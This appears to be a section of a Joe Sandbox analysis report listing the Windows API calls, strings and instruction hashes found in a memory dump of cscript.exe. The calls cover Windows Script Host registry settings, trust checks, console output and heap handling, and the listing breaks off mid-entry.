                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                      • String ID:
                                                      • API String ID: 1445889803-0
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                        • Part of subcall function 0062647E: GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00626542,00001000,?,?), ref: 006264A8
                                                        • Part of subcall function 0062647E: HeapAlloc.KERNEL32(00000000,?,00626542,00001000,?,?), ref: 006264AF
                                                      • CLSIDFromString.OLE32(?,00627F49,00001000,?,?), ref: 00626557
                                                      • CoCreateInstance.OLE32(00627F49,00000000,00000017,00623BD4,00000000,?,?), ref: 00626578
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocCreateFromInstanceProcessStringmalloc
                                                      • String ID: WSH$WScript
                                                      • API String ID: 3077083409-1019903269
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0062DDE0,006213B4), ref: 0062DCB1
                                                      • UnhandledExceptionFilter.KERNEL32(0062DDE0,?,0062DDE0,006213B4), ref: 0062DCBA
                                                      • GetCurrentProcess.KERNEL32(C0000409,?,0062DDE0,006213B4), ref: 0062DCC5
                                                      • TerminateProcess.KERNEL32(00000000,?,0062DDE0,006213B4), ref: 0062DCCC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                      • String ID:
                                                      • API String ID: 3231755760-0
                                                      • Opcode ID: 9afdaf0a5b74a8b7d6791ade345838c9b93ba36990a6ff444077f7e24b5c785e
                                                      • Instruction ID: 2a1623a05106a160bc0a28060aca9af394b825425bc8cf195bf6d8a3710a6b9b
                                                      • Opcode Fuzzy Hash: 9afdaf0a5b74a8b7d6791ade345838c9b93ba36990a6ff444077f7e24b5c785e
                                                      • Instruction Fuzzy Hash: 0FD0C932000504ABD7042BF1FD0CA493E2AEB4421AF045000F38982020CB338441ABA2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WScript.CreateObject
                                                      • API String ID: 0-1366894974
                                                      • Opcode ID: 39edde1431f5a949e272800e3e48637c5ebf1cc9f153b1267e093d85d0e2aee9
                                                      • Instruction ID: 6056ae44b6bc1083329f2a9ea6fd59746384776d59da844d200129384688bca1
                                                      • Opcode Fuzzy Hash: 39edde1431f5a949e272800e3e48637c5ebf1cc9f153b1267e093d85d0e2aee9
                                                      • Instruction Fuzzy Hash: 76A19B76604A129FC310DF64D891A6AB7E7AF88320F15462DF98797390DB34ED05CBD2
                                                      APIs
                                                      • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,00638371,00000000,00000000,00638426,00000000,00000000,?,?,00000000,?), ref: 006382C4
                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 006382D2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoad
                                                      • String ID: MUI
                                                      • API String ID: 2619053042-1339004836
                                                      • Opcode ID: dce43e3b330589e41875aefb3fc2421451aaa7291374888f60a7b5e5fed7e82d
                                                      • Instruction ID: 2ca8a0fe5bbeb890ef0a9b5d563cede46c5495136c422d54a416171f830c7fc8
                                                      • Opcode Fuzzy Hash: dce43e3b330589e41875aefb3fc2421451aaa7291374888f60a7b5e5fed7e82d
                                                      • Instruction Fuzzy Hash: 0DD01231245B307AE72417157C0DFD71A0FDF91725F125041F8109A190DBA55D4255E9
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00626542,00001000,?,?), ref: 006264A8
                                                      • HeapAlloc.KERNEL32(00000000,?,00626542,00001000,?,?), ref: 006264AF
                                                      • GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,00626542,00001000,?,?), ref: 0062E8CA
                                                      • HeapFree.KERNEL32(00000000,?,00626542,00001000,?,?), ref: 0062E8D1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocFree
                                                      • String ID:
                                                      • API String ID: 756756679-0
                                                      • Opcode ID: 8281748eb1ab5ea4b812331f9bb6d770f72c2e2fb8bdd353c45c7cbfc4b7fb07
                                                      • Instruction ID: 1cfbbc87fe7f89f9897f96266fbccf261edcf1c020b3c2192eb123017b087f5d
                                                      • Opcode Fuzzy Hash: 8281748eb1ab5ea4b812331f9bb6d770f72c2e2fb8bdd353c45c7cbfc4b7fb07
                                                      • Instruction Fuzzy Hash: 44F0F931504621DBD7282FA4ED0875676DAEB00721F20C529F5C6CB2D0D735C8409F65
                                                      APIs
                                                      • InitializeCriticalSection.KERNEL32(00639498,00638AD8,000000A0,00626E82), ref: 0062A9E8
                                                      • GetVersionExA.KERNEL32(00000094), ref: 0062AA06
                                                        • Part of subcall function 0062AADC: GetUserDefaultLCID.KERNEL32 ref: 0062AAFD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CriticalDefaultInitializeSectionUserVersion
                                                      • String ID:
                                                      • API String ID: 340135912-0
                                                      • Opcode ID: ebef666344c762cc8440ae15f49b4e196baeb536e3556f053d3e01c382250d07
                                                      • Instruction ID: 8326412cfbd3e816371a45cddc34f7ef432760b856a61b1c4bf951eecae55139
                                                      • Opcode Fuzzy Hash: ebef666344c762cc8440ae15f49b4e196baeb536e3556f053d3e01c382250d07
                                                      • Instruction Fuzzy Hash: B1117030A04764CFDB248FA4AE0978A77F2AB41305F1055E9D05692291D7F5068ADFB7
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000000), ref: 00637EAA
                                                      • wcsncmp.MSVCRT(?,0062433C,00000003), ref: 00637EBF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InfoLocalewcsncmp
                                                      • String ID:
                                                      • API String ID: 4128031126-0
                                                      • Opcode ID: 43a59a58da00fe66f4a7b4d8e4c1a9760492a9eb1bb793a158603b38e87dbadd
                                                      • Instruction ID: 717537a47ec5a40fd78e29a1a15c3ad39bbb401f4f6f5ae5c91a4d23c3cc3796
                                                      • Opcode Fuzzy Hash: 43a59a58da00fe66f4a7b4d8e4c1a9760492a9eb1bb793a158603b38e87dbadd
                                                      • Instruction Fuzzy Hash: 78F027B2A40208ABD710DBB4DC0AFDF77E99B04708F040260BA05E32C1EA70EE05CA95
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,20000070,00000000,00000002,00000000,?,0062AB0C), ref: 0062AB4B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: f32e745b3888503d5ef66e77eb6a5e0e14d4c1317784bafa67b12d83e9036b5b
                                                      • Instruction ID: ae2a4c88f428e6c4e8502c55d811534d52eb34fcbc9fe80973e8d027a8e564d9
                                                      • Opcode Fuzzy Hash: f32e745b3888503d5ef66e77eb6a5e0e14d4c1317784bafa67b12d83e9036b5b
                                                      • Instruction Fuzzy Hash: 94D05E36510308F7EF248BA19D4AF9B77ADDB4079EF144194A104E3090C6B9DF08EA61
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00000000,-00000001,?,-00000004), ref: 006276FF
                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00000000), ref: 00627742
                                                      • RegQueryValueExW.ADVAPI32(00000000,TrustPolicy,00000000,?,?,00000004), ref: 00627777
                                                      • RegQueryValueExW.ADVAPI32(00000000,TrustPolicy,00000000,?,?,00000004), ref: 006277E3
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00627844
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00627852
                                                        • Part of subcall function 006278F0: RegQueryValueExW.ADVAPI32(00000001,Enabled,00000000,?,?,?,00000000,00000001,Enabled), ref: 00627945
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,-00000001,?,-00000004), ref: 0062FB38
                                                      • __alloca_probe_16.LIBCMT ref: 0062FB44
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000), ref: 0062FB5C
                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000,?,00000000,00000000,00000000), ref: 0062FB77
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValue$ByteCharCloseMultiWide$__alloca_probe_16
                                                      • String ID: IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
                                                      • API String ID: 4224471349-2293819020
                                                      • Opcode ID: 981f57f40253fc1138658965a3d4d47750e032a46d728b2e41e696a87ff9aae3
                                                      • Instruction ID: 5c214d4034844ee729bba750556f400add2a589de48764b6c0b7831c6b6fccf0
                                                      • Opcode Fuzzy Hash: 981f57f40253fc1138658965a3d4d47750e032a46d728b2e41e696a87ff9aae3
                                                      • Instruction Fuzzy Hash: 7BB1AC30B48639BADB208B91AC06FFF777BAB14B15F240125FA51BA2C0D7B49501DF96
                                                      APIs
                                                        • Part of subcall function 0062B100: GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0062B120
                                                        • Part of subcall function 0062B100: GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 0062B158
                                                        • Part of subcall function 0062B100: strcpy_s.MSVCRT ref: 0062B172
                                                        • Part of subcall function 0062B100: strcpy_s.MSVCRT ref: 0062B183
                                                        • Part of subcall function 0062B100: LoadLibraryExA.KERNEL32(00000000,00000000,00000800), ref: 0062B194
                                                      • GetProcAddress.KERNEL32(00000000,SaferIdentifyLevel), ref: 0062AF21
                                                      • GetProcAddress.KERNEL32(00000000,SaferComputeTokenFromLevel), ref: 0062AF3B
                                                      • GetProcAddress.KERNEL32(00000000,SaferCloseLevel), ref: 0062AF55
                                                      • memset.MSVCRT ref: 0062AF7D
                                                      • memset.MSVCRT ref: 0062AFB9
                                                      • FreeLibrary.KERNEL32(00000000), ref: 0062B0C7
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0062B0E7
                                                      • CloseHandle.KERNEL32(00000000), ref: 0062B0F0
                                                      • SysStringLen.OLEAUT32(?), ref: 00631115
                                                      • wcsrchr.MSVCRT ref: 00631124
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$DirectoryFreeLibraryStringSystemmemsetstrcpy_s$CloseHandleLoadwcsrchr
                                                      • String ID: SCRIPT$SaferCloseLevel$SaferComputeTokenFromLevel$SaferIdentifyLevel$SaferRecordEventLogEntry$advapi32.dll
                                                      • API String ID: 1753717986-3460866070
                                                      • Opcode ID: c71a7cfd13037b014809f74535a3997699b64d436aba388272d46b82612b458e
                                                      • Instruction ID: 648c2a7f9206899b30404aa6a47001f4dc97191f82d48716d4541ab5c3f35373
                                                      • Opcode Fuzzy Hash: c71a7cfd13037b014809f74535a3997699b64d436aba388272d46b82612b458e
                                                      • Instruction Fuzzy Hash: BD917B70A007299FEB208F64DC48BDABBB6FF45304F005199E549AB380DB759E85CF92
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 006343F4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00634706), ref: 00634400
                                                      • GetTempPathA.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,00634706), ref: 00634420
                                                      • GetTempPathA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00634706), ref: 0063444A
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00634706), ref: 00634454
                                                      • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,00634706), ref: 00634612
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastPathTemp$ByteCharCloseHandleMultiWide
                                                      • String ID: wsh
                                                      • API String ID: 4111154415-3917767832
                                                      • Opcode ID: 1e4c7ea2c859045a37ad09a2a2e1b4ffed5d9d277ecac3b674a724a69229a1c7
                                                      • Instruction ID: 0c3c1efabe7c651e52e555a031878a81d577cb98ee6dcf4ecf9b087f8d7947c5
                                                      • Opcode Fuzzy Hash: 1e4c7ea2c859045a37ad09a2a2e1b4ffed5d9d277ecac3b674a724a69229a1c7
                                                      • Instruction Fuzzy Hash: 1671C376A01226AB8B109FA5CC48AFFBBAEEF06361F114129F845E7251DB34DD01D7E1
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00020019,00000000,?,00000000,-00000001,?,-00000004,?,?,006271FE,80000002), ref: 006275EF
                                                      • RegQueryValueExW.ADVAPI32(?,Timeout,00000000,006271FE,?,00000004,?,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00000000), ref: 00627628
                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00000000,00000000,00000000,?,?,006271FE), ref: 00627685
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,-00000001,?,-00000004,?,?,006271FE,80000002,?), ref: 0062F9FD
                                                      • GetLastError.KERNEL32(?,?,006271FE,80000002,?), ref: 0062FA09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0062FA92
                                                      • __alloca_probe_16.LIBCMT ref: 0062FA9E
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0062FAB9
                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,006271FE,?,00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00020019,00000000), ref: 0062FAD5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$QueryValue$CloseCreateErrorLast__alloca_probe_16
                                                      • String ID: DisplayLogo$Software\Microsoft\Windows Script Host\Settings$Timeout
                                                      • API String ID: 907685128-512383463
                                                      • Opcode ID: 1b325c06b88bbbed4df15bccf88e8f0d6616a09b501c9d5acffae96618b691fc
                                                      • Instruction ID: bcffec636314a57ef3ba9cd684b34d680e349328f7ee621c775e2d7fd18e1ae4
                                                      • Opcode Fuzzy Hash: 1b325c06b88bbbed4df15bccf88e8f0d6616a09b501c9d5acffae96618b691fc
                                                      • Instruction Fuzzy Hash: F6510E31B44B35FBEB208B98AC46FAA7676AB04714F200135FA15FE2D0D7A4AD409FD5
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00000000,00000000,00000001,?,00000000), ref: 006273CE
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?,?,00000000), ref: 006273F6
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000001,?,00000000), ref: 00627431
                                                      • RegCloseKey.ADVAPI32(?,?,00000001,?,00000000), ref: 00627441
                                                      • RegCloseKey.ADVAPI32(00000000,?,00000001,?,00000000), ref: 0062744F
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0062F6B7
                                                      • __alloca_probe_16.LIBCMT ref: 0062F6C3
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,00000000), ref: 0062F6DB
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0062F6F6
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 0062F71F
                                                      • __alloca_probe_16.LIBCMT ref: 0062F72B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,00000000), ref: 0062F743
                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,00000000,00000000,00000000,?,00000000), ref: 0062F75E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiOpenWide$Close__alloca_probe_16$InitializeSecurity
                                                      • String ID: Enabled$Software\Microsoft\Windows Script Host\Settings
                                                      • API String ID: 1102220367-4294085457
                                                      • Opcode ID: 0c240e527d28f53ee8d18e16663f7260b03d1d933292fe4f9aa0d0f0a526fde3
                                                      • Instruction ID: d877d7ca476835442a8d72e66781ede2a76cdcdf208ac51724c05589b7ad205a
                                                      • Opcode Fuzzy Hash: 0c240e527d28f53ee8d18e16663f7260b03d1d933292fe4f9aa0d0f0a526fde3
                                                      • Instruction Fuzzy Hash: A651B334784724BBE7205BA4BC46FAA77BBDB04B15F200124FA11BA3D1CBF4A9009ED5
                                                      APIs
                                                      • FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,7b,00000000,00000000,?,?,?,00000000,00000000,?,0062EC37,?), ref: 00631FE9
                                                      • LocalAlloc.KERNEL32(00000000,00000016,?,0062EC37,?), ref: 00631FFA
                                                      • GetLastError.KERNEL32(?,0062EC37,?), ref: 00632007
                                                      • swprintf_s.MSVCRT ref: 0063202E
                                                      • FormatMessageA.KERNEL32(000011FF,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000,?,0062EC37,?), ref: 00632045
                                                      • LocalAlloc.KERNEL32(00000000,0000000B,?,0062EC37,?), ref: 00632052
                                                      • sprintf_s.MSVCRT ref: 00632068
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,0062EC37,?), ref: 0063207A
                                                      • LocalAlloc.KERNEL32(00000000,00000000,?,0062EC37,?), ref: 0063208B
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,0062EC37,?), ref: 006320A5
                                                      • SysAllocString.OLEAUT32(7b), ref: 006320B6
                                                      • LocalFree.KERNEL32(00000000,?,0062EC37), ref: 006320C7
                                                      • LocalFree.KERNEL32(00000000), ref: 006320D6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide$ErrorLastStringsprintf_sswprintf_s
                                                      • String ID: 0x%8X$0x%8X$7b$7b
                                                      • API String ID: 1583499379-2648932889
                                                      • Opcode ID: 2b16499420305f0040038616b23c205acd36719e76a43beca316f8e9037dbd72
                                                      • Instruction ID: 1aee55196b7d12fda21e77b7f0516c963f648741598557dc8ade67ba98fa52d2
                                                      • Opcode Fuzzy Hash: 2b16499420305f0040038616b23c205acd36719e76a43beca316f8e9037dbd72
                                                      • Instruction Fuzzy Hash: B831AF31901226FBDB395BA59C1CEEFBEBEEF41751F104015F801E22A0D7708A44EAE2
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(ScriptFile,Path,00623CB4,?,00000104,?), ref: 006376EB
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00637701
                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 0063770D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiPrivateProfileStringWide
                                                      • String ID: Path$ScriptFile
                                                      • API String ID: 3760252266-3888212790
                                                      • Opcode ID: 0de0ff1e03b8c21c2fad35f067f487311477f7f84d96c4ec0eea6a1021e605ff
                                                      • Instruction ID: b25c11ea9f7c50f71829385b84bb3d40129c81d7dc97e1532e7848d9eac4c04a
                                                      • Opcode Fuzzy Hash: 0de0ff1e03b8c21c2fad35f067f487311477f7f84d96c4ec0eea6a1021e605ff
                                                      • Instruction Fuzzy Hash: 57415EF0A046227EE7301B695C4EEBB7AAEDB45B64F150528BD51E6290DAB4CC00DAF1
                                                      APIs
                                                      • GetProcessHeap.KERNEL32 ref: 006268E3
                                                      • HeapAlloc.KERNEL32(00000000), ref: 006268EA
                                                      • VariantClear.OLEAUT32(?), ref: 00626925
                                                      • VariantClear.OLEAUT32(?), ref: 00626930
                                                      • SafeArrayGetElement.OLEAUT32(?,00000000,?), ref: 00626941
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 0062696F
                                                      • GetStdHandle.KERNEL32(000000F5,00000000), ref: 006269F5
                                                      • VariantClear.OLEAUT32(?), ref: 00626A10
                                                      • VariantClear.OLEAUT32(?), ref: 00626A1B
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00626A28
                                                      • HeapFree.KERNEL32(00000000), ref: 00626A2F
                                                      • SysAllocString.OLEAUT32(null), ref: 0062E99D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearHeap$AllocProcess$ArrayChangeElementFreeHandleSafeStringType
                                                      • String ID: null
                                                      • API String ID: 253374567-634125391
                                                      • Opcode ID: d2d7568d5e509fe1d9bd90f5cc775337623acd4de138988bc36c92f88cf7b161
                                                      • Instruction ID: 4f83f489c8f79030da7d4d890b749e2483ef029b3402e32fd6abf50a5224b0f5
                                                      • Opcode Fuzzy Hash: d2d7568d5e509fe1d9bd90f5cc775337623acd4de138988bc36c92f88cf7b161
                                                      • Instruction Fuzzy Hash: BC51B0729047629BC310DF64E848A5BB7AABF88710F14952DF986E7250EB31D9448BE2
                                                      APIs
                                                      • GetPrivateProfileIntW.KERNEL32(Options,?,?,?), ref: 0063759B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0063755A,DisplayLogo), ref: 006375B1
                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,0063755A,DisplayLogo,?,00000001,?,?,006325DB,00000000,?,00000000), ref: 006375BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiPrivateProfileWide
                                                      • String ID: Options
                                                      • API String ID: 1820523601-529056539
                                                      • Opcode ID: d515c7dff002288f17c838b9662890ec8647433a567e7c8ac0e465cce4c8e6bb
                                                      • Instruction ID: b7ad4f7f30c00e4d5b5a94bf624c10ea2a34f8e768fbc8c43ab48c932e59cb6f
                                                      • Opcode Fuzzy Hash: d515c7dff002288f17c838b9662890ec8647433a567e7c8ac0e465cce4c8e6bb
                                                      • Instruction Fuzzy Hash: 0B3192B1205531BA9B391B6A9C0EEFB7E6EDF063B4B150218B815E2290DE60DD00DAF1
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0062BAA7
                                                      • HeapAlloc.KERNEL32(00000000), ref: 0062BAAE
                                                      • GetConsoleMode.KERNEL32(?,?,?,00000001,?,00000001), ref: 0062BBA5
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000001,?,00000001), ref: 0062BBC1
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0062BBFA
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0062BC21
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0062BC5E
                                                      • HeapFree.KERNEL32(00000000), ref: 0062BC65
                                                      • WriteConsoleW.KERNEL32(?,?,00003FFF,?,00000000,?,00000001,?,00000001), ref: 0062BCA1
                                                      • GetLastError.KERNEL32 ref: 0062E4D1
                                                      • GetLastError.KERNEL32 ref: 0062E521
                                                      • GetLastError.KERNEL32 ref: 0062E533
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Heap$ErrorLast$ByteCharConsoleMultiProcessWideWrite$AllocFileFreeMode
                                                      • String ID:
                                                      • API String ID: 702828211-0
                                                      • Opcode ID: de2a1113e9b144e6995bb12f86605814fff74eff1487e3028cde39b1ae96afdf
                                                      • Instruction ID: 7ceb0b2c1615f2aa8801d93c702a94c517846072682b4676fdb4ebb841ec7843
                                                      • Opcode Fuzzy Hash: de2a1113e9b144e6995bb12f86605814fff74eff1487e3028cde39b1ae96afdf
                                                      • Instruction Fuzzy Hash: 59B1C774B007399BDB249B54EC88BEA77B6EB14300F1051B9E949EB351DF719E808F91
                                                      APIs
                                                        • Part of subcall function 0062B100: GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0062B120
                                                        • Part of subcall function 0062B100: GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 0062B158
                                                        • Part of subcall function 0062B100: strcpy_s.MSVCRT ref: 0062B172
                                                        • Part of subcall function 0062B100: strcpy_s.MSVCRT ref: 0062B183
                                                        • Part of subcall function 0062B100: LoadLibraryExA.KERNEL32(00000000,00000000,00000800), ref: 0062B194
                                                      • GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 0063468D
                                                      • GetLastError.KERNEL32 ref: 0063469A
